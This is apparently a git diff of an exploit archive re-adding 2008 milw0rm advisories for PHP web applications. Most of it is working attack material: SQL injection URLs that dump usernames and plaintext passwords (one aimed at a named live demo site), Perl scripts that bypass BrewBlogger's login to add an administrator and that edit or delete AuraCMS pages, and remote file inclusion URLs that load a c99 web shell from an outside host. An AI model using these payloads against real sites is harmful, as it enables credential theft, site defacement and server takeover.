+	http://site.com/index.php?go=listings&listing_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONVERT(CONCAT(0x3C666F6E7420636F6C6F723D7265643E,username,0x3a,password,0x3C2F666F6E743E)/**/using/**/latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/FROM/**/users/**/LIMIT/**/0,1/*
+
+
+
+[*] NOTE/TIP: 
+
+	admin login is at /admin/
+	passwords are in plaintext
+
+
+
+[*] GREETZ: 
+
+	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
+
+
+
+[-] Peace...
+
+	...t0pP8uZz !
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+	       Real Estate Script <= 1.1 Remote SQL Injection Vulnerability	     +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-08]
diff --git a/platforms/php/webapps/6023.pl b/platforms/php/webapps/6023.pl
index 50e8d58d1..9ef9720bf 100755
--- a/platforms/php/webapps/6023.pl
+++ b/platforms/php/webapps/6023.pl
@@ -1,128 +1,128 @@
-#!/usr/bin/perl
-#=================================================
-# BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit
-#=================================================
-#
-#  ,--^----------,--------,-----,-------^--,
-#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-#  `+---------------------------^----------|
-#    `\_,-------, _________________________|
-#      / XXXXXX /`|     /
-#     / XXXXXX /  `\   /
-#    / XXXXXX /\______(
-#   / XXXXXX /           
-#  / XXXXXX /
-# (________(             
-#  `------'
-#
-#AUTHOR : CWH Underground
-#DATE : 8 July 2008
-#SITE : www.citec.us
-#
-#
-#####################################################
-#APPLICATION : BrewBlogger
-#VERSION : 2.1.0.1
-#DOWNLOAD : http://downloads.sourceforge.net/brewblogger/BB2.1.0.1.zip?modtime=1196093070&big_mirror=0
-######################################################
-#
-#Note: magic_quotes_gpc = off
-#
-#This Exploit will Add user to Administrator's Privilege.
-#
-#####################################################################
-# Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos   
-# Special Thx : asylu3, str0ke, CITEC, milw0rm
-#####################################################################
-
-use LWP;
-use HTTP::Request;
-use HTTP::Cookies;
-
-print "\n==================================================\n";
-print " BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit \n";
-print " \n";
-print "         Discovered By CWH Underground \n";
-print "==================================================\n";
-print "                                              \n";
-print "  ,--^----------,--------,-----,-------^--,   \n";
-print "  | |||||||||   `--------'     |          O	\n";
-print "  `+---------------------------^----------|   \n";
-print "    `\_,-------, _________________________|   \n";
-print "      / XXXXXX /`|     /                      \n";
-print "     / XXXXXX /  `\   /                       \n";
-print "    / XXXXXX /\______(                        \n";
-print "   / XXXXXX /                                 \n";
-print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
-print " (________(                                   \n";
-print "  `------'                                    \n";
-print "                                              \n";
-
-if ($#ARGV + 1 != 3)
-{
-   print "Usage: ./xpl-brewblogger.pl   \n";
-   print "Ex. ./xpl-brewblogger.pl http://www.target.com/BrewBlogger/ cwhuser cwhpass\n";
-   exit();
-}
-
-$blogurl = $ARGV[0];
-$user = $ARGV[1];
-$pass = $ARGV[2];
-
-
-$loginurl = $blogurl."includes/logincheck.inc.php";
-$adduserurl = $blogurl."admin/process.php?action=add&dbTable=users";
-$post_content = "x=38&y=15&realFirstName=FirstName&realLastName=LastName&userLevel=1&user_name=".$user."&password=".$pass;
-
-print "\n..::Login Page URL::..\n";
-print "$loginurl";
-print "\n..::Add User Page URL::..\n";
-print "$adduserurl\n\n";
-print "..::Login Process::..\n";
-
-$ua = LWP::UserAgent->new;
-$ua->cookie_jar(HTTP::Cookies->new);
-
-$request = HTTP::Request->new (POST => $loginurl);
-$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
-$request->content_type ('application/x-www-form-urlencoded');
-$request->content ('loginUsername=\'+or+id=1/*&loginPassword=&x=0&y=0'); 
-
-$response = $ua->request($request);
-$location = $response -> header('Location');
-print "Result :: ";
-
-if ($location =~ /..\/admin\/index.php/)
-{
-   print "Login Success!!!\n";
-}
-else
-{
-   print "Login Failed T T\n";
-   exit();
-}
-
-print "\n..::Add Admin Process::..\n";
-$request = HTTP::Request->new (POST => $adduserurl);
-$request->content_type ('application/x-www-form-urlencoded');
-$request->content ($post_content);
-$response = $ua->request($request);
-
-$location = "";
-$location = $response->header('Location');
-print "Result :: ";
-
-if ($location =~ /index.php\?action=list&dbTable=users&confirm=true&msg=1/)
-{
-   print "Exploit Success!!!\n\n";
-   print "Username :: ".$user."\n";
-   print "Password :: ".$pass."\n";
-   print "Role     :: Administrator\n";
-}
-else
-{
-   print "Exploit Failed T T\n";
-   exit();
-}
-
-# milw0rm.com [2008-07-08]
+#!/usr/bin/perl
+#=================================================
+# BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit
+#=================================================
+#
+#  ,--^----------,--------,-----,-------^--,
+#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+#  `+---------------------------^----------|
+#    `\_,-------, _________________________|
+#      / XXXXXX /`|     /
+#     / XXXXXX /  `\   /
+#    / XXXXXX /\______(
+#   / XXXXXX /           
+#  / XXXXXX /
+# (________(             
+#  `------'
+#
+#AUTHOR : CWH Underground
+#DATE : 8 July 2008
+#SITE : www.citec.us
+#
+#
+#####################################################
+#APPLICATION : BrewBlogger
+#VERSION : 2.1.0.1
+#DOWNLOAD : http://downloads.sourceforge.net/brewblogger/BB2.1.0.1.zip?modtime=1196093070&big_mirror=0
+######################################################
+#
+#Note: magic_quotes_gpc = off
+#
+#This Exploit will Add user to Administrator's Privilege.
+#
+#####################################################################
+# Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos   
+# Special Thx : asylu3, str0ke, CITEC, milw0rm
+#####################################################################
+
+use LWP;
+use HTTP::Request;
+use HTTP::Cookies;
+
+print "\n==================================================\n";
+print " BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit \n";
+print " \n";
+print "         Discovered By CWH Underground \n";
+print "==================================================\n";
+print "                                              \n";
+print "  ,--^----------,--------,-----,-------^--,   \n";
+print "  | |||||||||   `--------'     |          O	\n";
+print "  `+---------------------------^----------|   \n";
+print "    `\_,-------, _________________________|   \n";
+print "      / XXXXXX /`|     /                      \n";
+print "     / XXXXXX /  `\   /                       \n";
+print "    / XXXXXX /\______(                        \n";
+print "   / XXXXXX /                                 \n";
+print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
+print " (________(                                   \n";
+print "  `------'                                    \n";
+print "                                              \n";
+
+if ($#ARGV + 1 != 3)
+{
+   print "Usage: ./xpl-brewblogger.pl   \n";
+   print "Ex. ./xpl-brewblogger.pl http://www.target.com/BrewBlogger/ cwhuser cwhpass\n";
+   exit();
+}
+
+$blogurl = $ARGV[0];
+$user = $ARGV[1];
+$pass = $ARGV[2];
+
+
+$loginurl = $blogurl."includes/logincheck.inc.php";
+$adduserurl = $blogurl."admin/process.php?action=add&dbTable=users";
+$post_content = "x=38&y=15&realFirstName=FirstName&realLastName=LastName&userLevel=1&user_name=".$user."&password=".$pass;
+
+print "\n..::Login Page URL::..\n";
+print "$loginurl";
+print "\n..::Add User Page URL::..\n";
+print "$adduserurl\n\n";
+print "..::Login Process::..\n";
+
+$ua = LWP::UserAgent->new;
+$ua->cookie_jar(HTTP::Cookies->new);
+
+$request = HTTP::Request->new (POST => $loginurl);
+$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
+$request->content_type ('application/x-www-form-urlencoded');
+$request->content ('loginUsername=\'+or+id=1/*&loginPassword=&x=0&y=0'); 
+
+$response = $ua->request($request);
+$location = $response -> header('Location');
+print "Result :: ";
+
+if ($location =~ /..\/admin\/index.php/)
+{
+   print "Login Success!!!\n";
+}
+else
+{
+   print "Login Failed T T\n";
+   exit();
+}
+
+print "\n..::Add Admin Process::..\n";
+$request = HTTP::Request->new (POST => $adduserurl);
+$request->content_type ('application/x-www-form-urlencoded');
+$request->content ($post_content);
+$response = $ua->request($request);
+
+$location = "";
+$location = $response->header('Location');
+print "Result :: ";
+
+if ($location =~ /index.php\?action=list&dbTable=users&confirm=true&msg=1/)
+{
+   print "Exploit Success!!!\n\n";
+   print "Username :: ".$user."\n";
+   print "Password :: ".$pass."\n";
+   print "Role     :: Administrator\n";
+}
+else
+{
+   print "Exploit Failed T T\n";
+   exit();
+}
+
+# milw0rm.com [2008-07-08]
diff --git a/platforms/php/webapps/6024.txt b/platforms/php/webapps/6024.txt
index e86aa99e0..a687dc9de 100755
--- a/platforms/php/webapps/6024.txt
+++ b/platforms/php/webapps/6024.txt
@@ -1,33 +1,33 @@
-# Name Of Script : Dolphin PHP
-
-# Version : 6.1.2
-
-# Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dolphin-v.6.1.2-Free.zip
-
-# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]
-
-# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ]
-
-# Type Of Exploit : RFI In Multiple Files
-
-# Introduce : Some Of Modules Is Infected And Some In Pulgins You Will See Below
-
-# POC : 
-
-http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?
-
-http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/safehtml.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?
-
-http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/ray/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt?
-
-# Also We See RFI In Different Files But .htaccess Is Deny All Files In Some Path
-
-# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD
-
-# Note : No One Perfect  :) 
-
-# rXh
-
-# bEST wISHES
-
-# milw0rm.com [2008-07-08]
+# Name Of Script : Dolphin PHP
+
+# Version : 6.1.2
+
+# Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dolphin-v.6.1.2-Free.zip
+
+# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]
+
+# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ]
+
+# Type Of Exploit : RFI In Multiple Files
+
+# Introduce : Some Of Modules Is Infected And Some In Pulgins You Will See Below
+
+# POC : 
+
+http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?
+
+http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/safehtml.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?
+
+http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/ray/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt?
+
+# Also We See RFI In Different Files But .htaccess Is Deny All Files In Some Path
+
+# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD
+
+# Note : No One Perfect  :) 
+
+# rXh
+
+# bEST wISHES
+
+# milw0rm.com [2008-07-08]
diff --git a/platforms/php/webapps/6025.txt b/platforms/php/webapps/6025.txt
index 9fcb8f50a..25ed140d4 100755
--- a/platforms/php/webapps/6025.txt
+++ b/platforms/php/webapps/6025.txt
@@ -1,31 +1,31 @@
--------------------------------------------------------------------------------------------
-                                				
-   Joomla Component com_content SQL Injection Vulnerabity
-                                				
--------------------------------------------------------------------------------------------
-
-
- Author    :  unknown_styler
-
- Dork      :  inurl:com_content
-
- POC        : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
-
- Example    : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*
-
-------------------------------------------------------------------------------------------------------------------------------------
-
-                                         Greetings :  h4ck-y0u.org
-
-side note:
-
-Página de contenido
-Projecte Joomla!
-July 2004
-(C) 2005 Open Source Matters. All rights reserved.
-http://www.gnu.org/copyleft/gpl.html GNU/GPL
-admin@joomla.org
-www.joomla.org
-1.0.0
-
-# milw0rm.com [2008-07-08]
+-------------------------------------------------------------------------------------------
+                                				
+   Joomla Component com_content SQL Injection Vulnerabity
+                                				
+-------------------------------------------------------------------------------------------
+
+
+ Author    :  unknown_styler
+
+ Dork      :  inurl:com_content
+
+ POC        : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
+
+ Example    : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*
+
+------------------------------------------------------------------------------------------------------------------------------------
+
+                                         Greetings :  h4ck-y0u.org
+
+side note:
+
+Página de contenido
+Projecte Joomla!
+July 2004
+(C) 2005 Open Source Matters. All rights reserved.
+http://www.gnu.org/copyleft/gpl.html GNU/GPL
+admin@joomla.org
+www.joomla.org
+1.0.0
+
+# milw0rm.com [2008-07-08]
diff --git a/platforms/php/webapps/6027.txt b/platforms/php/webapps/6027.txt
index c83324532..e78169164 100755
--- a/platforms/php/webapps/6027.txt
+++ b/platforms/php/webapps/6027.txt
@@ -1,58 +1,58 @@
--[*]+================================================================================+[*]-
--[*]+	        Last Minute Script <= 4.0 Remote SQL Injection Vulnerability	     +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: t0pP8uZz
-[*] Discovered On: 8 JULY 2008
-[*] Script Download: http://www.mole-group.com/content/view/31/45/
-[*] DORK: N/A
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION: 
-
-	Last Minute Script 4.0 (and all prior versions) suffer from a multirow SQL injection flaw,
-	This allows the remote attacker to execute arbitrary MySQL querys, and possibly gaining access 
-	to confidential information.
-
-	below is a example.
-
-	
-
-[*] SQL Injection:
-
-	http://site.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/*
-
-
-
-[*] NOTE/TIP: 
-
-	passwords are in plaintext.
-
-	There are also other SQL injections around the site which i have found, So no one even bother to post has seperate vulns.
-
-
-
-[*] GREETZ: 
-
-	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
-
-
-
-[-] Peace...
-
-	...t0pP8uZz !
-
-
-
--[*]+================================================================================+[*]-
--[*]+	        Last Minute Script <= 4.0 Remote SQL Injection Vulnerability	     +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-08]
+-[*]+================================================================================+[*]-
+-[*]+	        Last Minute Script <= 4.0 Remote SQL Injection Vulnerability	     +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: t0pP8uZz
+[*] Discovered On: 8 JULY 2008
+[*] Script Download: http://www.mole-group.com/content/view/31/45/
+[*] DORK: N/A
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION: 
+
+	Last Minute Script 4.0 (and all prior versions) suffer from a multirow SQL injection flaw,
+	This allows the remote attacker to execute arbitrary MySQL querys, and possibly gaining access 
+	to confidential information.
+
+	below is a example.
+
+	
+
+[*] SQL Injection:
+
+	http://site.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/*
+
+
+
+[*] NOTE/TIP: 
+
+	passwords are in plaintext.
+
+	There are also other SQL injections around the site which i have found, So no one even bother to post has seperate vulns.
+
+
+
+[*] GREETZ: 
+
+	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
+
+
+
+[-] Peace...
+
+	...t0pP8uZz !
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+	        Last Minute Script <= 4.0 Remote SQL Injection Vulnerability	     +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-08]
diff --git a/platforms/php/webapps/6028.txt b/platforms/php/webapps/6028.txt
index 1af9d1fd3..777eb55f5 100755
--- a/platforms/php/webapps/6028.txt
+++ b/platforms/php/webapps/6028.txt
@@ -1,25 +1,25 @@
-# Name Of Script : Ray
-
-# Version : 3.5
-
-# Download From : http://get.boonex.com/Ray-v.3.5-Suite-Free
-
-# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]
-
-# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ]
-
-# Type Of Exploit : RFI
-
-# POC : 
-
-http://WwW.4RxH.CoM/ray.3.5/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt?
-
-# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD
-
-# Note : No One Perfect  :) 
-
-# rXh
-
-# bEST wISHES
-
-# milw0rm.com [2008-07-08]
+# Name Of Script : Ray
+
+# Version : 3.5
+
+# Download From : http://get.boonex.com/Ray-v.3.5-Suite-Free
+
+# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]
+
+# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ]
+
+# Type Of Exploit : RFI
+
+# POC : 
+
+http://WwW.4RxH.CoM/ray.3.5/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt?
+
+# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD
+
+# Note : No One Perfect  :) 
+
+# rXh
+
+# bEST wISHES
+
+# milw0rm.com [2008-07-08]
diff --git a/platforms/php/webapps/6033.pl b/platforms/php/webapps/6033.pl
index 8060b5929..1690921c2 100755
--- a/platforms/php/webapps/6033.pl
+++ b/platforms/php/webapps/6033.pl
@@ -1,109 +1,109 @@
-#!/usr/bin/perl
-# k1tk4t Public Security Advisory
-# ////////////////////////////////////////////////////////////
-# AuraCMS <= 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete data halaman exploit 
-# Vendor	: http://www.auracms.org/
-# Kutu		: ./js/pages/pages_data.php
-# Keterangan	: 
-# pada berkas pages_data.php dari awal hingga akhir tidak adanya aturan yang jelas, siapa, hak, level
-# dalam mengakses berkas ini, kenapa perlu kejelasan aturan untuk berkas ini? 
-# karena didalam berkas ini terdapat kode yang dapat menghapus(delete)
-# menambahkan(add), mengedit(edit) data halaman didalam database auracms, sehingga
-# dengan tidak adanya kejelasan aturan pada berkas pages_data.php ini 
-# maka berkas ini mutlak terdapat KUTU yang amat menjijikan.... huee.....   :( 
-# potongan kode dari pages_data.php
-# --//--
-# 03: @ob_start('ob_gzhandler');
-# 04: @header("Content-type: text/plain; charset=utf-8;");
-# 05: @header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1
-# 06: @header("Pragma: no-cache");
-# 07:
-# 08: include '../../includes/session.php';
-# 09: include '../../includes/config.php';
-# 10: include '../../includes/fungsi.php';
-# 11: include '../../includes/mysql.php';
-# 12: include '../../includes/json.php';
-# 13:
-# 14:
-# 15: if (!isset($_SESSION['mod_ajax'])){
-# 16: exit;   
-# 17: }
-# --//--
-# Lihat.... tidak ada aturan di baris pertama hingga baris ke 17, mengenai siapa, hak, level dan aturan lainnya
-# dalam mengakses berkas ini
-# --//--
-# 20: switch (@$_GET['action']){
-# 21:        
-# 22: case 'add':
-# 23: $_POST = array_map ('decodeURIComponent',$_POST);
-# 24: $judul = $_POST['judul'];
-# 25: $konten = $_POST['konten'];
-# 26: $open['error'] = false;
-# 27: $open['errorpesan'] = '';
-# 28: if (!empty($judul) && !empty($konten)){
-# 29: $query = mysql_query ("INSERT INTO `halaman` (`judul`,`konten`) VALUES ('$judul','$konten')");
-# 30: if ($query){
-# --//--
-# diatas ini satu contoh bagaimana berkas ini berperilaku, lihat... bisa menambahkan data halaman pada database kan... 
-# kacoooo, kacoooo,  :( 
-# selebihnya liat sendiri yaa... panjang soalnya... :p
-#
-# Terimakasih untuk ;
-# str0ke,DNX,n0c0py,L41n,
-# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],
-# eCHo->[y3dips,K-159,lirva32,dan staff lainnya] 
-use LWP::UserAgent;
-use HTTP::Cookies;
-use Getopt::Long;
-
-if ( !$ARGV[1] ) {
-	print "\n ///////////////////////////////////////////////////////////";
-	print "\n //                ..::> k1tk4t <::..                     //";
-	print "\n //     AuraCMS <= 2.2.2 (pages_data.php)                 //";
-	print "\n //     Arbitrary Edit/Add/Delete data halaman exploit    //";
-	print "\n ///////////////////////////////////////////////////////////";
-	print "\n[!] ";
-	print "\n[!] Penggunaan : perl auracms_pagesdata.pl [Site] [Path] [id_halaman] [options]";
-	print "\n[!] Contoh     : perl auracms_pagesdata.pl localhost /toko/ 1 -o 1";
-	print "\n[!] Options : 1=Edit , 2=Delete, 3=Add";
-	print "\n";
-	exit;
-}
-my $host = $ARGV[0];
-my $path = $ARGV[1];
-my $idhalaman = $ARGV[2];
-my $isijudul = "AuraCMS <= 2.2.2 Hacked";
-my $isikonten = "Mohon Perhatian!!! terdapat kutu pada berkas pages_data.php, Arbitrary Edit-Add-Delete data halaman";
-my $ambilkue = "http://".$host.$path."index.php";
-my $browser = LWP::UserAgent->new;
-my $kue = HTTP::Cookies->new();
-my $hasil = "";
-%options = ();
-GetOptions(\%options, "o=i",);
-if($options{"o"} && $options{"o"} == 1) { 
-$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=edit_saved&id="; 
-}
-if($options{"o"} && $options{"o"} == 2) { 
-$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=delete&id="; 
-}
-if($options{"o"} && $options{"o"} == 3) { 
-$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=add&id="; 
-}
-
-$hasil = $browser->get($arbitrary);
-if(!$hasil->is_success) {
-die("[!] Gagal, berkas pages_data.php tidak tersedia\n");
-}
-
-#  ambil kue dari website
-$hasil = $browser->get($ambilkue);
-$kue->extract_cookies($hasil);
-$browser->cookie_jar($kue);
-
-# arbitrary exploit 
-$arbitrary .= $idhalaman;
-$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
-$konten = $hasil->content;
-print $konten ;
-
-# milw0rm.com [2008-07-09]
+#!/usr/bin/perl
+# k1tk4t Public Security Advisory
+# ////////////////////////////////////////////////////////////
+# AuraCMS <= 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete data halaman exploit 
+# Vendor	: http://www.auracms.org/
+# Kutu		: ./js/pages/pages_data.php
+# Keterangan	: 
+# pada berkas pages_data.php dari awal hingga akhir tidak adanya aturan yang jelas, siapa, hak, level
+# dalam mengakses berkas ini, kenapa perlu kejelasan aturan untuk berkas ini? 
+# karena didalam berkas ini terdapat kode yang dapat menghapus(delete)
+# menambahkan(add), mengedit(edit) data halaman didalam database auracms, sehingga
+# dengan tidak adanya kejelasan aturan pada berkas pages_data.php ini 
+# maka berkas ini mutlak terdapat KUTU yang amat menjijikan.... huee.....   :( 
+# potongan kode dari pages_data.php
+# --//--
+# 03: @ob_start('ob_gzhandler');
+# 04: @header("Content-type: text/plain; charset=utf-8;");
+# 05: @header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1
+# 06: @header("Pragma: no-cache");
+# 07:
+# 08: include '../../includes/session.php';
+# 09: include '../../includes/config.php';
+# 10: include '../../includes/fungsi.php';
+# 11: include '../../includes/mysql.php';
+# 12: include '../../includes/json.php';
+# 13:
+# 14:
+# 15: if (!isset($_SESSION['mod_ajax'])){
+# 16: exit;   
+# 17: }
+# --//--
+# Lihat.... tidak ada aturan di baris pertama hingga baris ke 17, mengenai siapa, hak, level dan aturan lainnya
+# dalam mengakses berkas ini
+# --//--
+# 20: switch (@$_GET['action']){
+# 21:        
+# 22: case 'add':
+# 23: $_POST = array_map ('decodeURIComponent',$_POST);
+# 24: $judul = $_POST['judul'];
+# 25: $konten = $_POST['konten'];
+# 26: $open['error'] = false;
+# 27: $open['errorpesan'] = '';
+# 28: if (!empty($judul) && !empty($konten)){
+# 29: $query = mysql_query ("INSERT INTO `halaman` (`judul`,`konten`) VALUES ('$judul','$konten')");
+# 30: if ($query){
+# --//--
+# diatas ini satu contoh bagaimana berkas ini berperilaku, lihat... bisa menambahkan data halaman pada database kan... 
+# kacoooo, kacoooo,  :( 
+# selebihnya liat sendiri yaa... panjang soalnya... :p
+#
+# Terimakasih untuk ;
+# str0ke,DNX,n0c0py,L41n,
+# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],
+# eCHo->[y3dips,K-159,lirva32,dan staff lainnya] 
+use LWP::UserAgent;
+use HTTP::Cookies;
+use Getopt::Long;
+
+if ( !$ARGV[1] ) {
+	print "\n ///////////////////////////////////////////////////////////";
+	print "\n //                ..::> k1tk4t <::..                     //";
+	print "\n //     AuraCMS <= 2.2.2 (pages_data.php)                 //";
+	print "\n //     Arbitrary Edit/Add/Delete data halaman exploit    //";
+	print "\n ///////////////////////////////////////////////////////////";
+	print "\n[!] ";
+	print "\n[!] Penggunaan : perl auracms_pagesdata.pl [Site] [Path] [id_halaman] [options]";
+	print "\n[!] Contoh     : perl auracms_pagesdata.pl localhost /toko/ 1 -o 1";
+	print "\n[!] Options : 1=Edit , 2=Delete, 3=Add";
+	print "\n";
+	exit;
+}
+my $host = $ARGV[0];
+my $path = $ARGV[1];
+my $idhalaman = $ARGV[2];
+my $isijudul = "AuraCMS <= 2.2.2 Hacked";
+my $isikonten = "Mohon Perhatian!!! terdapat kutu pada berkas pages_data.php, Arbitrary Edit-Add-Delete data halaman";
+my $ambilkue = "http://".$host.$path."index.php";
+my $browser = LWP::UserAgent->new;
+my $kue = HTTP::Cookies->new();
+my $hasil = "";
+%options = ();
+GetOptions(\%options, "o=i",);
+if($options{"o"} && $options{"o"} == 1) { 
+$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=edit_saved&id="; 
+}
+if($options{"o"} && $options{"o"} == 2) { 
+$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=delete&id="; 
+}
+if($options{"o"} && $options{"o"} == 3) { 
+$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=add&id="; 
+}
+
+$hasil = $browser->get($arbitrary);
+if(!$hasil->is_success) {
+die("[!] Gagal, berkas pages_data.php tidak tersedia\n");
+}
+
+#  ambil kue dari website
+$hasil = $browser->get($ambilkue);
+$kue->extract_cookies($hasil);
+$browser->cookie_jar($kue);
+
+# arbitrary exploit 
+$arbitrary .= $idhalaman;
+$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
+$konten = $hasil->content;
+print $konten ;
+
+# milw0rm.com [2008-07-09]
diff --git a/platforms/php/webapps/6034.txt b/platforms/php/webapps/6034.txt
index dfd6fbfd9..c567760be 100755
--- a/platforms/php/webapps/6034.txt
+++ b/platforms/php/webapps/6034.txt
@@ -1,43 +1,43 @@
-#########################################################
-#
-#     PICS BUILDER (page) SQL Injection Vulnerability
-#========================================================
-#    Author: Hussin X                                   =
-#                                                       =
-#    Home :  www.tryag.cc/cc                            =
-#                                                       =
-#    email:  darkangel_g85[at]Yahoo[DoT]com             =
-#                                                       =
-#=========================================================    
-#
-#    script :  http://www.dreamlevels.com/dreampics.php
-#
-#    DorK   :   powered by Dreampics Builder
-#     
-##########################################################
-
-Exploit: 
-
-www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
-
-
-L!VE DEMO:
-
-http://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
-
-
-Admin Login :
-
-/admin/
-
-########################( Greetz )###########################
-#                                                           #
-# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    #
-#                                                           #    
-#         Iraqihack / FAHD / mos_chori / Silic0n            #
-#                                                           #
-#############################################################
-
-                       Im IRAQi
-
-# milw0rm.com [2008-07-09]
+#########################################################
+#
+#     PICS BUILDER (page) SQL Injection Vulnerability
+#========================================================
+#    Author: Hussin X                                   =
+#                                                       =
+#    Home :  www.tryag.cc/cc                            =
+#                                                       =
+#    email:  darkangel_g85[at]Yahoo[DoT]com             =
+#                                                       =
+#=========================================================    
+#
+#    script :  http://www.dreamlevels.com/dreampics.php
+#
+#    DorK   :   powered by Dreampics Builder
+#     
+##########################################################
+
+Exploit: 
+
+www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
+
+
+L!VE DEMO:
+
+http://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
+
+
+Admin Login :
+
+/admin/
+
+########################( Greetz )###########################
+#                                                           #
+# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    #
+#                                                           #    
+#         Iraqihack / FAHD / mos_chori / Silic0n            #
+#                                                           #
+#############################################################
+
+                       Im IRAQi
+
+# milw0rm.com [2008-07-09]
diff --git a/platforms/php/webapps/6035.txt b/platforms/php/webapps/6035.txt
index 100619fda..62d0a71fd 100755
--- a/platforms/php/webapps/6035.txt
+++ b/platforms/php/webapps/6035.txt
@@ -1,50 +1,50 @@
-#########################################################
-#
-#     dreamnews ( rss) Remote SQL Injection Vulnerability
-#========================================================
-#    Author: Hussin X                                   =
-#                                                       =
